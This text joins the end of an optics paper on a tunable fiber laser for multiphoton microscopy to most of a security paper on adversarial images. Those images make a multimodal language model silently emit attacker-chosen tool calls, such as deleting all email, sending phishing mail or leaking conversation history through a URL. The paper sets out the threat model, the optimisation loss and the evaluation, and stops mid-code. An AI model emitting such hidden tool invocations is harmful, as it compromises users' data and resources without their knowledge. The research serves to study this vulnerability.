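The pulse-width-versus-GDD tuning described above can be illustrated with the textbook relation for a chirped pulse; the minimal sketch below assumes a Gaussian pulse shape for simplicity (the text quotes FWHM and sech\({}^{2}\) widths), so the numbers are indicative only and the GDD values are assumed settings rather than measured ones.

```python
import math

def chirped_fwhm(fwhm_fs, gdd_fs2):
    """FWHM of an initially transform-limited Gaussian pulse after adding group delay dispersion."""
    return fwhm_fs * math.sqrt(1.0 + (4.0 * math.log(2.0) * gdd_fs2 / fwhm_fs ** 2) ** 2)

fwhm0 = 60.0  # fs; near-transform-limited FWHM quoted in the text
for gdd in (0.0, 1e3, 3e3, 5e3, 1e4):  # fs^2; illustrative GDD settings
    print(f"GDD = {gdd:7.0f} fs^2  ->  FWHM = {chirped_fwhm(fwhm0, gdd):6.1f} fs")
```

With these assumed settings the pulse width spans roughly 60 fs to above 400 fs, consistent with the chirping/tuning range stated in the text.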
The unique fiber delivery of spectrally filtered fiber supercontinuum pulses excels at user-friendly and cost-effective operation. First, for pulse parameters (\(\lambda\), \(f\), and \(\tau\)) of choice, spectrally monitoring the corresponding deterministically generated fiber supercontinuum ensures day-to-day reproducible optical alignment before the FNWC (Fig. 1a). Second, for a pre-selected spectrum of fiber supercontinuum, monitoring the corresponding fiber delivery output spectrum, power (and plausibly PER), and modal content [45] ensures day-to-day reproducible optical alignment before the application modules (Fig. 2a). Third, the fiber-optic telecommunication-based connection and disconnection of the delivery fiber not only ensures the beneficial feature of laser-microscope alignment decoupling [29], but also enables simple switching or sharing of an integrated pp-FCPA-FNWC laser among multiphoton microscopes [46] or other applications (Fig. 2a). ## 6 Perspectives on adaptive femtosecond photonics We have described a new tunable ultrafast laser (FNWC) suitable for _in vivo_ optical molecular imaging by multiphoton microscopy [47], which is known for overall good performance in 3D sectioning ability, molecular sensitivity/specificity (via fluorescence), and image content (e.g. field of view, spatial resolution, and depth). The label-free variant of multiphoton microscopy [48] lies at the intersection of fluorescence microscopy [49], imaging spectroscopy [50], and label-free nonlinear imaging [51], which gain multicolor image contrasts at the cost of phototoxicity or photodamage, single-frame acquisition speed or signal-to-noise ratio (SNR), and complexity or expense of the laser source, respectively (Table S6). Our FNWC may overcome these trade-offs to enable gentle laser-scanning label-free multiphoton imaging spectroscopy at this intersection, by limiting the phototoxicity or photodamage via monitoring wavelength-dependent hyper-fluorescence (i.e. a spectroscopic inline phototoxicity indicator) [52], by increasing single-frame acquisition speed or SNR via single-pulse broadband signal generation [53], and by decreasing the complexity or expense of the laser source via fiber-optic telecommunication connection or disconnection (Table S6). This may motivate a shift of fluorescence microscopy from wide-field (or light-sheet) to the less popular laser-scanning configuration [47], a shift of imaging spectroscopy from optical filters and discrete multispectral channels to less used gratings/prisms and continuous color detection [54, 55] (Table S7), and a shift of label-free nonlinear molecular imaging from molecular vibration [56] to often overlooked auto-fluorescence and harmonics [53]. With free-space output (without the fiber-coupled delivery), the stable supercontinuum generation portion of FNWC allows programmable label-free contrast generation for multiphoton microscopy [29]. The tunable aspect of FNWC will enable fast prototyping or optimization of imaging conditions not available from alternative lasers [57]. For multiphoton microscopy with photon order \(n\) (integer \(>1\)), the signal generation rate scales with \(P^{n}/(f\tau)^{n-1}\). Thus, a combined low-\(f\) and short-\(\tau\) excitation condition, i.e., a high duty-cycle inverse \((f\tau)^{-1}\), would enhance the signal at a given \(P\), which is limited by the laser safety standard of the American National Standards Institute (ANSI). However, one well-known photodamage mechanism also scales with \(P^{r}/(f\tau)^{r-1}\), in which the nonlinear order \(r\) lies between 2 and 3 [58].
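To make the two scaling laws above concrete, the following minimal sketch compares the relative two-photon signal (\(n=2\)) and photodamage of order \(r\) at fixed average power when the duty cycle \(f\tau\) is varied; the repetition rates, pulse widths, and damage orders used here are assumptions chosen for illustration only.

```python
# Relative signal and photodamage rates at a fixed average power P (set to 1, arbitrary units):
#   signal      ~ P**n / (f*tau)**(n - 1)
#   photodamage ~ P**r / (f*tau)**(r - 1)
# so the signal-to-damage ratio scales as (f*tau)**(r - n).
n = 2.0  # photon order of the signal (two-photon excitation)

for r in (1.0, 2.5):  # a low-order and a highly nonlinear photodamage order (assumed values)
    print(f"photodamage order r = {r}")
    for f_hz, tau_s in ((10e6, 400e-15), (1e6, 40e-15)):  # high vs low duty cycle f*tau (assumed)
        duty = f_hz * tau_s
        signal = 1.0 / duty ** (n - 1.0)
        damage = 1.0 / duty ** (r - 1.0)
        print(f"  f = {f_hz / 1e6:4.0f} MHz, tau = {tau_s * 1e15:5.0f} fs, "
              f"f*tau = {duty:.1e}, signal/damage ratio = {signal / damage:.2e}")
```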
Given a two-photon signal of interest (\(n=2\)), the mitigation of this highly nonlinear (\(2<\)\(r<3\)) photodamage demands a low duty-cycle inverse (\(f\tau\))\({}^{-1}\) because \(n<r\). On the other hand, there exists another popular photodamage mechanism that includes two-photon absorption-induced photochemical damage (\(r=2\)) [59] and one-photon absorption-induced photothermal damage (\(r=1\)) [60]. Because \(n\geq r\), the mitigation of this low-\(r\) photodamage demands a high duty-cycle inverse. Thus, the flexibility in \(f\) and \(\tau\) is needed to optimize the signal-to-photodamage ratio for two-photon microscopy, depending on specific biological samples and photodamage mechanisms. It should be noted that our FNWC is not limited to label-free imaging. Due to the relatively high peak-power afforded by our FNWC, its deficiency in two-photon excitation of common fluorophores below 950 nm may be compensated by three-photon excitation across 950-1110 nm. The impact of our FNWC on multiphoton microscopy may be extended to other areas of femtosecond biophotonics (e.g. precision surgery, optogenetics, and laser tweezer) to address the unmet needs of a laser source: i) widely and independently tuned in \(\lambda\), \(f\), and \(\tau\) with sufficient \(P\) or \(E\); ii) easily shared among different applications adaptive to evolving biological interest; and iii) reliably operated in a portable cart plausibly outside an environmentally controlled laboratory. Due to the extensive use of various optical fibers, we believe the resulting ultrafast pulse delivery robust against environmental perturbations may broaden the access to tunable ultrafast laser technology from scientists working in dedicated optical laboratories to diverse users working in real-world situations, e.g., field biologists, neuroscientists, veterinarians, surgeons, and pathologists. **Funding.** National Institutes of Health (R01 CA241618); National Natural Science Foundation of China (81671730, 82171991), and the Special Funds of the Central Government Guiding Local Science and Technology Development (2020L3008). **Data availability.** Major data that support the findings of this study are available within the manuscript.
2310.03185
Misusing Tools in Large Language Models With Visual Adversarial Examples
Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (~98%) while maintaining high similarity to clean images (~0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM.
Xiaohan Fu, Zihan Wang, Shuheng Li, Rajesh K. Gupta, Niloofar Mireshghallah, Taylor Berg-Kirkpatrick, Earlence Fernandes
2023-10-04T22:10:01Z
http://arxiv.org/abs/2310.03185v1
# Misusing Tools in Large Language Models With Visual Adversarial Examples ###### Abstract Large Language Models (LLMs) are being enhanced with the ability to use tools and to process multiple modalities. These new capabilities bring new benefits and also new security risks. In this work, we show that an attacker can use visual adversarial examples to cause attacker-desired tool usage. For example, the attacker could cause a victim LLM to delete calendar events, leak private conversations and book hotels. Different from prior work, our attacks can affect the confidentiality and integrity of user resources connected to the LLM while being stealthy and generalizable to multiple input prompts. We construct these attacks using gradient-based adversarial training and characterize performance along multiple dimensions. We find that our adversarial images can manipulate the LLM to invoke tools following real-world syntax almost always (\(\sim\)98%) while maintaining high similarity to clean images (\(\sim\)0.9 SSIM). Furthermore, using human scoring and automated metrics, we find that the attacks do not noticeably affect the conversation (and its semantics) between the user and the LLM. ## 1 Introduction Conversational Large Language Models (LLMs) exhibit state-of-the-art performance on tasks that require natural language understanding, reasoning, and problem-solving. To enhance their capabilities, model developers have begun augmenting LLMs with third-party extensions, tools, and plugins (PemAI, 2023; Rajesh Jha, 2023; AutoGPT, 2023; Yury Pinsky, 2023)1 and also with the ability to understand images and sound (OpenAI, 2023c). Furthermore, frameworks like LangChain (LangChain, 2023) and Guidance (Microsoft, 2023a) facilitate development of such integrations. These enhanced LLMs can retrieve up-to-date information from the Internet and achieve more complex tasks such as flight reservations and email management. Footnote 1: For brevity, we refer to all three categories as “tools” in the rest of this paper. Unfortunately, these multimodal tool-enhanced LLMs face new security threats with the broadened resources and privileges they can access -- a misbehaving model now has the potential to affect user resources that are integrated with the LLM. For example, the LLM is able to delete a user's calendar, email sensitive conversation history to the attacker, or cause financial harm to the user by booking hotels. We observe that such problems are more _security-relevant_ (_i.e._, having real impacts on the confidentiality and integrity of user resources) compared to other widely-discussed vulnerabilities such as "jailbreaking" (i.e., an LLM producing content that violates broadly accepted human values). A growing line of work has started exploring attacks on LLMs. For example, textual prompt-injection attacks manipulate the LLM to exfiltrate user data or call integrated tools in ways that are inconsistent with user expectations (Greshake et al., 2023; Samoilenko, 2023). These works embed malicious text instructions on the web, hoping that an unsuspecting user might simply ask the LLM to summarize an attacker-controlled webpage and cause the LLM to accidentally ingest and operate on those instructions. Such attacks are security-relevant but are not stealthy -- a security-conscious user can detect the presence of unrelated instructions by examining the prompt history. 
Another line of work uses gradient information to compute adversarial examples (Bagdasaryan et al., 2023; Zou et al., 2023) attacking specific prompts. For instance, Bagdasaryan et al. (2023) show that when the user enters a pre-defined prompt (_e.g.,_ "describe the image") together with the adversarial image, a multimodal LLM will output attacker-specified text (_e.g.,_ "From now on I will always mention the word: cow"). This style of attack only works for the specific prompt it is optimized on, but not for any other general user inputs. It is also not stealthy because the response of the LLM is unexpected. Furthermore, it is not security-relevant because user resources are unaffected. However, it does show the potential of utilizing non-text modalities to stealthily embed malicious instructions that could manipulate a user's external resources. Motivated by the above discussion, we observe the following gap -- existing attacks are not security-relevant _and_ stealthy. Our work closes the gap in the attack space by proposing a white-box image-based attack against multimodal LLMs. Attackers can craft trojan-like images that instruct the victim LLM to invoke some attacker-specified tools or external API calls. Figure 1 presents an example of our attack. We observe that the adversarial image looks normal and the conversation remains reasonable and natural across different user inputs. Also, observe that the attack "harms" the user by abusing the email tool. Specifically, our attack has the following properties: * **Tools-abusing:** The attack manipulates the LLM into taking sensitive actions on a user's resources (_e.g.,_ deleting a user's mailbox) by invoking integrated tools in complex and non-natural-language syntax precisely. This makes it security-relevant. * **Stealthy:** A security-conscious user examining the input prompt will not be able to easily determine whether an attack can occur because the image has imperceptible perturbations. Furthermore, the attack remains stealthy _after_ the LLM ingests the prompt because the attack maintains response utility (i.e., the conversation between the user and the LLM remains reasonable, natural, and indistinguishable from conversations when _no_ attack is present). * **Generalizable:** The attack works across different prompts that can be both related and unrelated to the image. This is important because in the real world, a prompt is under the user's control. An attack should not assume specific prompts. We observe that our attack does not violate safety alignment. Using tools/plugins is a natural and expected behavior of LLMs. Our work also highlights an important shortcoming in current definitions of alignment -- most current efforts focus on broadly applicable human values. Yet, user- and task-specific misalignment can occur through attacks like ours. Detecting and preventing such misalignments requires fine-grained information about a specific user's intentions that is typically unavailable during alignment efforts using current techniques, e.g., RLHF (Stiennon et al., 2020). Figure 1: An example of our attack. The benign-looking adversarial image manipulates the model to generate malicious tool invocations (in red) as we specified under different conversation contexts in addition to a normal response. The tool invocation text will not be printed out in practice since it will be directly processed as a function call (see ChatGPT).
To achieve the aforementioned properties of our attack, we adopt traditional gradient-based adversarial training (Goodfellow et al., 2014) that optimizes the adversarial image in a continuous space. First, we design a training loss that decomposes the generation objective in order to maintain normal conversation responses while injecting malicious tool usage. We also incorporate an image regularization term to control the adversarial image quality. This novel loss function balances between image and response stealthiness and success rate on making function calls/tool invocations. Second, we construct prompt-response training pairs to enable attack generalization to unseen prompts. We query GPT-4 to generate image-related questions and acquire image-unrelated questions from the Alpaca instruction dataset (Taori et al., 2023), and obtain responses from the target model. **Contributions. (1)** We propose a stealthy, security-relevant white-box attack that causes multimodal LLMs to invoke attacker-desired tools. These attacks have real impacts on the confidentiality and integrity of user resources. These attacks close a gap in the literature relating to realistic attacks on LLMs. **(2)** We characterize the performance of this attack using both human-based and automated metrics for stealthiness and success rates (see details in Section 4). ## 2 System and Threat Model The attacker targets a user and their victim LLM that is integrated with tools. The LLM is trained to generate text following specific tool invocation syntax with arguments it infers from the user. A framework wrapping the LLM will proactively scan the model outputs and execute the tool accordingly when a syntax match is found (e.g., ChatGPT, Microsoft Semantic Kernel). This segment of text for tool invocation will not be printed out and is unseeable by users. We assume that the user and the victim LLM are benign, similar to Greshake et al. (2023); Samoilenko (2023). Note that this setting is distinct from attacks where the users are malicious such as Zou et al. (2023) and Maus et al. (2023). The attacker's motivation is to manipulate the confidentiality and integrity of user resources that are connected to the LLM. For example, the attacker could cause financial harm to a user by reserving hotels or could delete user data. We further assume that the attacker has white-box access to the (weights of) victim LLM. This assumption is reasonable as there are a range of open-source LLMs (e.g., LLama, Vicuna, StarCoder). Furthermore, recent work has demonstrated the black-box transferability of attacks to closed models like GPT and Bard (Zou et al., 2023; Qi et al., 2023). While we do not examine the transferability of our attacks, we observe that it is important future work. There are several methods to deliver the attack to the user. For example, the attacker may share the adversarial image on social media and lure users to play with it _e.g._, "Try "Describe this image" on your LLM" or they may embed the adversarial image in webpages that could be read by LLM accidentally while browsing the Internet. At this point, the attack image is injected into the victim LLM. 
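As a purely illustrative sketch of the wrapper behavior described above (scanning model output for tool-invocation syntax and executing a matching tool while hiding the invocation text from the user), the snippet below uses a regex over text of the form <function.name arg="value"> shown in Table 1; the regex, the handler registry, and the printed behavior are assumptions rather than the mechanism of any specific framework.

```python
import re
from typing import Callable, Dict

# Illustrative registry of callable tools; names mirror the attack objectives listed in Table 1.
TOOLS: Dict[str, Callable[..., str]] = {
    "delete_email": lambda which: f"(would delete emails: {which})",
    "send_email": lambda input, to: f"(would send '{input}' to {to})",
}

# Matches tool-invocation text such as <function.send_email input="hi" to="[email protected]">.
CALL_PATTERN = re.compile(r'<function\.(\w+)((?:\s+\w+="[^"]*")*)\s*>')
ARG_PATTERN = re.compile(r'(\w+)="([^"]*)"')

def scan_and_dispatch(model_output: str) -> str:
    """Execute any matching tool calls and strip the invocation text from what the user sees."""
    for match in CALL_PATTERN.finditer(model_output):
        name, arg_text = match.group(1), match.group(2)
        kwargs = dict(ARG_PATTERN.findall(arg_text))
        if name in TOOLS:
            print("tool call:", name, kwargs, "->", TOOLS[name](**kwargs))
    return CALL_PATTERN.sub("", model_output).strip()

# The user only sees the natural-language answer; the injected invocation runs silently.
print(scan_and_dispatch('Sure, the image shows a dog. <function.delete_email which="all">'))
```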
A successful attack must achieve the attacker-desired tool abuse and must also satisfy the following properties to be disguised enough for a long-lasting spread: (1) _Stealthy_: the image appears benign to a human, and the conversation should have good response utility (i.e., the conversation with the attack present should remain reasonable and natural, and indistinguishable from clean conversations with humans); and (2) _Generalizable_: the attack should work across a range of input prompts. We differentiate our work from existing "jailbreaking" attacks by noting that the effect of our attack directly manipulates user resources that are connected to the victim LLM. Existing jailbreaking attacks are typically concerned with breaking safety alignment and causing the LLM to produce content that violates broadly accepted human values. More related work is discussed in Appendix A.1. ## 3 Adversarial Image Optimization The goal of our attack is to find an adversarial image that can stealthily trigger attacker-desired malicious tool invocations while generalizing to any prompt that a user might provide. Our attack uses the insight that in a multimodal LLM, the image prompt is vulnerable to gradient-based adversarial training that optimizes in a continuous space (Goodfellow et al., 2014). In this section, we discuss the design of the training objective, which balances stealthiness and attack success rate. In Section 4.1, we discuss how to construct a prompt-response training set to achieve the generalization property of our attack. ### Attack Variants We consider five attacks with distinct attack objectives, corresponding to five different levels of complexity in the required tool invocation instructions. We list the details of these attack objectives in Table 1. For the first three attack objectives, _i.e.,_ delete_email, send_email, and send_email_hard, the invocation instructions have similar syntax (same prefix and keyword arguments) but require an increasing amount of non-natural-language text, which we expect to make these attacks increasingly difficult to produce. The instructions here follow the function call syntax specified by Microsoft (2023b). For the fourth attack objective, book_ticket, the instruction is a more complicated JSON with many special characters in its syntax and is more challenging. This instruction follows the call syntax of ChatGPT to the Expedia plugin. For the last attack objective, md_url_query, the instruction involves a component (the query string in the URL) that is a URL-encoded copy of the previous user inputs representing the conversation history. Such copy-and-encode behavior is extremely difficult for the LLM to produce and makes this attack objective the most challenging of the five. The syntax here follows a standard markdown image href that is supported by ChatGPT natively, as inspired by Samoilenko (2023). ### Attack Objective As shown in Figure 2, our attack targets mainstream off-the-shelf multimodal LLMs that respond with text or intrinsic instructions for tool invocation based on text and image prompts. Let \(M\) denote the LLM and \(\{c,x,y\}\) denote an input-output tuple. Generally, \(M\) takes as input a text prompt \(c\) and an image \(x\), and outputs a response sequence \(y=M(c,x)\) through a search algorithm (e.g., beam search or sampling) based on the trained probabilistic model. 
The attack goal is to train a small perturbation \(\delta\) to apply to the original image so that the model generates certain outputs specified by the attacker, namely, gives a desired output \(y^{\prime}=M(c,x+\delta)\). To camouflage our attack, \(y^{\prime}\) is constructed by the concatenation of the normal response \(y\) and \(y_{adv}\), a malicious instruction that the attacker intends to trigger. Generally speaking, the training objective can be written as minimizing the negative log probability of generating target \(y^{\prime}\), parameterized by model weights \(\theta\): \(-\log P_{\theta}(y^{\prime}|c,x+\delta)\). \begin{table} \begin{tabular}{l l} \hline \hline Attack Objective & Target Tool Invocation Instruction \\ \hline delete\_email & \textless{}**function.delete\_email** which="all"\textgreater{} \\ send\_email & \textless{}**function.send\_email** input="I wish you a merry Christmas" to="hacker@mail.com"\textgreater{} \\ send\_email\_hard & \textless{}**function.send\_email\_hard** input="Free Costco Membership, click here https://tinyurl.com/nhyd@rb4" to="[email protected]"\textgreater{} \\ book\_ticket & REQUEST TO EXPEDIA, followed by a JSON request body in the call syntax of ChatGPT's Expedia plugin \\ md\_url\_query & A markdown image href whose URL query string is a URL-encoded copy of the previous user inputs \\ \hline \hline \end{tabular} \end{table} Table 1: The five attack objectives and their target tool invocation instructions. ### Attack Stealthiness Trade-off The stealthiness of our attack is two-fold: (1) the attack image should look similar to the original one, and (2) apart from the attack payload for tool invocations, the text response should otherwise be a reasonable reply to the prompt. Intuitively, achieving stealthiness inevitably harms the attack success rate, so we introduce how this trade-off is handled in our objective function. To ensure the quality of the adversarial image, \(\delta\) needs to be as small as possible. 
We apply an additional \(l_{2}\) normalization term to the objective, which is technically equivalent to the Projected Gradient Descent attack (Madry et al., 2017) that projects the gradient term onto an \(L_{p}\) norm boundary. Note that the \(l_{2}\) norm of \(\delta\) is computed with regard to each color channel separately and is controlled by \(\lambda_{i}\). The objective of adversarial training is then written as: \[\min_{\delta}\,-\log P_{\theta}(y^{\prime}|c,x+\delta)+\lambda_{i}||\delta|| \tag{1}\] In the current loss function, we are using a hard target of \(y^{\prime}=[y;y_{adv}]\) to ensure response stealthiness. It is challenging because \(y_{adv}\) is mainly non-natural syntax and forcing the output to contain exactly the normal response \(y\) can make convergence difficult or can harm the stealthiness of \(\delta\). In real-world conversational systems, users will tolerate various responses to their prompts as long as they seem natural and reasonable. However, users can easily sense something is wrong if the injected malicious instruction cannot fully comply with the format of function calls. This failure will make the attack tokens appear in the rendered model response. To minimize the chances of this happening, we reduce the contribution of the loss term corresponding to \(y\) (i.e., the normal response to the user's prompt). We modify (1) and weight the cross entropy loss for \(y\) and \(y_{adv}\) separately as: \[\min_{\delta}\,-\log P_{\theta}(y_{adv}|y,c,x+\delta)-\lambda_{r}\log P_{ \theta}(y|c,x+\delta)+\lambda_{i}||\delta||. \tag{2}\] In the equation, the log probability of generating the adversarial instruction \(y_{adv}\) is conditioned on both the prompt and the normal response. We use \(\lambda_{r}\) to control the trade-off of the supervision from the ground truth response. We summarize the architecture of our attack in Figure 2. **Training Details.** To effectively train \(\delta\) so that it can be generalized to all of the text prompt sequences, we create a training dataset \(\mathcal{D}\) containing multiple pairs of \(\{(c_{j},y_{j})\}\), where \(y_{j}\) is the normal response of \(M\) given prompt \(c_{j}\) and \(x\). The objective is to optimize all the prompts jointly: \[\min_{\delta}\,\frac{1}{|\mathcal{D}|}\sum_{j}^{|\mathcal{D}|}(-\log P_{ \theta}(y_{adv}|[c_{j};y_{j}],x+\delta)-\lambda_{r}\log P_{\theta}(y_{j}|c_{j },x+\delta))+\lambda_{i}||\delta||. \tag{3}\] We introduce the details of how we construct \(\mathcal{D}\) in Section 4.1. We adopt Adam optimizer (Kingma and Ba, 2014) to solve the optimization problem for acceleration and better results. The learning rate of the optimizer is denoted as \(\alpha\) and tuned in our experiments, while the other hyperparameters in the optimizer are left as default (\(\beta_{1}=0.9\) and \(\beta_{2}=0.999\)). Figure 2: Overall architecture of our attack method. We train the targeted image using gradient-based optimization, and separate the loss term into three components, aiming at keeping perturbations imperceptible, maintaining response utility, and achieving malicious behavior respectively. Evaluation To evaluate the attack, we need to measure how well it generates tool invocation syntax according to the attacker's intentions (success rate for different attack variants), the stealthiness of the attack (both image stealthiness and response utility), and the generalization of the attack to unseen prompts. We test the attack on an open-sourced multimodal LLM -- LLaMA Adapter (Zhang et al., 2023). 
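As a concrete companion to Eqs. (1)-(3) and the training details above, the sketch below shows one way the optimization could be implemented. It is only an illustration under stated assumptions: `target_logprob` is a hypothetical wrapper around the victim model that returns the summed log-probability of a target continuation given a prompt, an optional prefix, and an image; it is not LLaMA Adapter's actual API.

```python
import torch

def eq3_loss(model, delta, image, pairs, y_adv_ids, lambda_r=1.0, lambda_i=0.02):
    """Eq. (3): average, over prompt-response pairs (c_j, y_j), of the malicious-
    instruction term and the weighted response-utility term, plus a per-channel
    l2 penalty on the perturbation delta (all names here are illustrative)."""
    x_adv = image + delta
    total = 0.0
    for c, y in pairs:
        # -log P(y_adv | [c; y], x + delta): make the tool invocation follow the normal reply
        total = total - model.target_logprob(prompt=c, prefix=y, target=y_adv_ids, image=x_adv)
        # -lambda_r * log P(y | c, x + delta): keep the visible reply natural
        total = total - lambda_r * model.target_logprob(prompt=c, prefix=None, target=y, image=x_adv)
    channel_l2 = delta.reshape(delta.shape[0], -1).norm(dim=1).sum()  # l2 per color channel
    return total / len(pairs) + lambda_i * channel_l2

# A hypothetical training loop matching the hyperparameters reported in Section 4
# (Adam, learning rate 0.01, 12000 steps, batch size 1):
# delta = torch.zeros_like(image, requires_grad=True)
# opt = torch.optim.Adam([delta], lr=0.01)
# for step in range(12000):
#     loss = eq3_loss(model, delta, image, [next_pair()], y_adv_ids)
#     opt.zero_grad(); loss.backward(); opt.step()
```

The key design choice mirrored here is that only the perturbation receives gradients; the model weights stay frozen throughout.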
In brief, LLaMA Adapter encodes an image into a sequence of representations, which are treated as tokens and appended to the text input, such that token generation is conditioned on the image. From now on, we refer to LLaMA Adapter as the _model_. Note that our attacks are only applied to the image part of the input prompt. For our attack method, we set \(\alpha=0.01,\lambda_{i}=0.02,\lambda_{r}=1.0\) and train for 12000 steps with a batch size of 1. Details on how these values were chosen are in Appendix A.6. We observed significant randomness during adversarial image training. In some cases, different trials (where the only difference is the random seed) can lead to either an almost perfect attack or a completely failed attack. Therefore, for all experiments, we report the best result among three trials, since attackers will always choose the best-performing adversarial image. We apply our attack method to three different base images to demonstrate the robustness of our attack across various images. Image sources and preprocessing details are in Appendix A.2. ### Dataset Construction To evaluate the generalizability of our attack, we create prompt datasets for training and evaluation independently under two categories: (1) prompts that are related to images (image-related) and (2) prompts that are unrelated to images (image-unrelated). For training, the image-related prompts are obtained by querying GPT-4 with the prompt: "Generate 100 questions related to an image". These questions are applicable to any general image, but the responses should be varied and specific to each image. The image-unrelated prompts are the first 3200 questions in the Alpaca instruction-following dataset (Taori et al., 2023). For testing, we consider an in-domain generalization setup where the image-related prompts are created by a human volunteer instructed to create 50 different prompts similar to the prompts in the training set, and the image-unrelated prompts are a disjoint set of 100 questions in the Alpaca dataset. Additionally, to test out-domain generalization, we create an out-domain test set. For the image-related prompts, we first generate a textual summary of the image through Bard, and then prompt GPT-4 with the summary and ask it to generate 50 questions given the image summary. Note that the questions for each image would be different in this case. For the image-unrelated prompts, we prompt GPT-4 to generate 50 general questions. Note that for the instructions from the Alpaca dataset, we omit prompts that contain an input section, as well as prompts that are too long, to keep most generations under a reasonable length of 128 tokens and speed up training. This leaves us 1803 of the 3200 image-unrelated prompts for training, and 64 of the 100 image-unrelated prompts for evaluation. Since the training set of unrelated prompts is much larger than that of related prompts, we mix them during training at a ratio of \(85:15\). ### Metrics We feed our adversarial images to the model against prompts in the test datasets and obtain one response for each prompt. To evaluate the success and stealthiness of our attack, we consider three measures: the fraction of cases where the model emits a tool usage instruction in the response according to the attacker's intent (success rate), the similarity between the perturbed image and the clean image (image stealthiness), and the indistinguishability between the model responses with and without the attack present in terms of being reasonable and natural (response utility). 
**Attack Success.** A successful attack would require an exact reproduction of the tool invocation instruction (exact match). However, a tool invocation may also be produced with correct syntax but wrong arguments (syntax match). We measure and report the _proportion_ of these two cases among all tested prompt-response pairs as two metrics: * **Syntax.** Syntax match checks whether the tool invocation instruction in the generated response follows the correct syntax. The syntax here refers to a sequence of characters that is specific to each tool. For example, in the delete_email attack the correct syntax consists of the tool name function.delete_email and a string argument which="", wrapped by a pair of angle brackets. When the syntax is matched, the LLM will execute the tool with the arguments provided -- whether the execution exactly follows the attacker's intention depends on whether the arguments are precise. Failed syntax matches, _e.g.,_ wrong or partial function/argument keywords, will not be parsed by the LLM, and that text will be printed out and seen by users. * **Exact.** Exact match measures whether the generated instruction in the response is exactly the same as the desired tool invocation instruction. Note that an exact match is _always_ a syntax match. **Image Stealthiness.** We measure the visual difference between the perturbed adversarial image and its original. The more similar the two images are, the better the stealthiness of the attack. We use the popular Structural Similarity Index Measure (SSIM) to quantify the similarity between the two images. An SSIM score of \(\geq 0.9\) is typically indistinguishable to humans; an example is shown in Appendix A.3. **Response Utility.** By definition, this is best measured by humans' opinions on whether the conversation between the user and model looks reasonable and natural. However, we also consider several automated metrics, since human annotation may not be possible in large-scale experiments, _e.g.,_ our in- and out-domain test sets. These automated metrics all rely on responses generated with no attack present to compare against.2 Note that the response represents what a user sees in the conversation -- a tool invocation with _correct_ syntax is invisible to users and thus is excluded from the response. Footnote 2: We tried using other multimodal LLMs to imitate the human annotation but obtained poor results. Commercial ones like Bard are better but have not yet granted us API access. We leave this as future work. * _Human Preference (Human)._ We ask human annotators to judge whether a response is natural and reasonable with respect to the question and the original clean image. Each prompt-response pair is judged by three graduate students majoring in Computer Science who are unrelated to this project, and we obtain the final result with a majority vote to filter out idiosyncratic preferences. The annotation guidelines can be found in Appendix A.4. * _Unattacked Image Loss (Loss)._ For each question and a response, we obtain the (self-supervised) cross-entropy loss of the response given the question as a prefix, evaluated on the unattacked image. This loss measures how natural the clean model believes the response is. * _GPT-4 Selection (Selection)._ We additionally generate three responses with no attack present (clean) and mix them with the response with the attack present (attacked). We then query GPT-4 to identify the most different text among the four. 
The random guess rate is 25% -- an accuracy higher than that indicates GPT-4 can distinguish the clean responses from the attacked responses. The prompt we used is in Appendix A.4. * _BLEU/Rouge Scores._ We measured the BLEU/Rouge scores between the above-mentioned attacked responses and the three clean responses. Both scores measure the n-gram overlap between a text sequence and a list of reference text sequences and are widely used in machine translation and summarization, respectively. For Rouge scores, we utilized Rouge-1, Rouge-2, and Rouge-L scores as three different metrics. Figure 3: Illustration of various cases of attacks. Note that the texts marked in red, same as in Figure 1, are tool invocations that will not be printed out and are invisible to users. ### Human Evaluation of Response Utility We are interested in how well our attack works from human perspectives in general and how closely the automated response utility metrics represent human preference. To understand these questions, we conduct a human evaluation on a subset of the responses from the experiment in Table 4. The subset is randomly sampled such that we have one response with the attack present for every 214 questions in the in-domain test set.3 We collect one response for each such sampled question with no attack present as a baseline reference. Footnote 3: 50 image-related questions for 3 images and 64 image-unrelated questions. **Analysis of Disagreements among Human Annotators.** The Cohen Kappa inter-annotator scores between (pairs of) annotators are in the range of 0.2 - 0.4. This indicates a certain, but not high, agreement between annotators, which is reasonable because annotators can interpret naturalness differently. As an alternative metric, we calculate the percentage of questions that annotators find the response with the attack present better than the clean response. This percentage is less than 7%, which is an indicator that annotators are mostly consistent in their preference. **Human Evaluation Result.** In Table 2, we show the human preference metric for the responses with and without the attack. We note that overall, the responses generated with the attack present show a drop of around 10% human preference scores compared to those generated without the attack. This indicates that our attack maintains the response utility fairly indistinguishable from clean responses. **Correlation Between Automated Metrics and Human Preferences.** We noticed that in Table 2 the GPT-4 Selection, BLEU, and Rouge metrics show unusual drops when the attack is present (much larger than the 10% drop in human preference scores). Therefore we conduct a study to understand which automated metrics best correlate with human preference. Here we only focus on the 214 responses generated with the attack present. Each automated metric represents a preference score on the naturalness and reasonableness of each response (for Loss and GPT-4 Selection we negate the value). We then calculate the AUC ROC score of the automated metrics against the human preference results (see Table 3). From the table, it is clear that for both image-related questions and image-unrelated questions, the Loss metric, among all the automated metrics, correlates with the human preference the best, by a large margin. Therefore, we decide to use only the loss metric for the evaluation of response utility. 
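To make the metrics above concrete, the following sketch shows how the attack-success checks, the SSIM-based image stealthiness score, and the AUC-ROC comparison of an automated utility metric against human preference could be computed. The regular expression for the delete_email syntax and the exact scikit-image/scikit-learn calls are our assumptions for illustration, not the evaluation code used in the paper.

```python
import re
import numpy as np
from skimage.metrics import structural_similarity as ssim
from sklearn.metrics import roc_auc_score

EXACT_TARGET = '<function.delete_email which="all">'
# Loose pattern: correct tool name plus a quoted `which` argument with any value.
SYNTAX_PATTERN = re.compile(r'<function\.delete_email\s+which="[^"]*">')

def attack_success(response: str) -> dict:
    """Syntax match vs. exact match for a single generated response."""
    return {"syntax": bool(SYNTAX_PATTERN.search(response)),
            "exact": EXACT_TARGET in response}

def image_stealthiness(clean: np.ndarray, adversarial: np.ndarray) -> float:
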